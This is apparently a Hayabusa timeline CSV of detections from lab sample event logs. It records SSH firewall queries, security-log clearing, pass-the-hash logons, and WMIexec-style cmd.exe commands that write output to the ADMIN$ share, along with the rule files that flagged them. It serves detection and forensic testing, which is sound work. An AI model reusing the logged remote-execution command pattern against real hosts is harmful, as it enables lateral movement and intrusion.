2021-04-22 19:19:39.096 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:43.030 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value=""*ssh*"" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:43.031 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?OpenSSH-Server-In-..., PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:43.034 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:43.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
